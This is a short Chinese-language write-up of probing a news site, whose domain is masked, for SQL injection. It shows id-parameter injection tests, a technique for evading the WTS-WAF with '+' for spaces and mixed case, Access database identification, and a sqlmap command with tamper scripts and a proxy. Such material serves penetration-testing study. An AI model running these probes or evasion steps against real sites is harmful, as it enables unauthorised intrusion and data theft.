判断是否存在注入:
方法1减法判断:
正常页面id=14
注入测试id=14-1也就是id=13,页面正常跳转存在注入。
方法2 and和or判断:
构造id=14 and 1=1,发现被WTS-WAF拦截了
经过反复尝试,这里可以利用“+”替换空格和大写字母绕过WTS-WAF,并且此waf没有过滤and。
id=14+and+1=1成功显示:
id=14+and+1=2没有显示文章:
根据报错信息很明显是Access数据库,但是其中的and IsPass我有点不懂。
access数据库特点: 表名—->列名—->内容数据 不像其他的数据库 可创建多个数据库然后才是表再是内容 access只有一个库若干张表。
二话不说用sqlmap跑一下,结果没有跑出来
sqlmap.py -u “http://www.XXXXX.com/news_list.jsp?type=8&pkID=7288*” –user-agent ” Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; BIDUBrowser 7.6)” –proxy=http://127.0.0.1:1080 –tamper “randomcase.py,space2plus.py”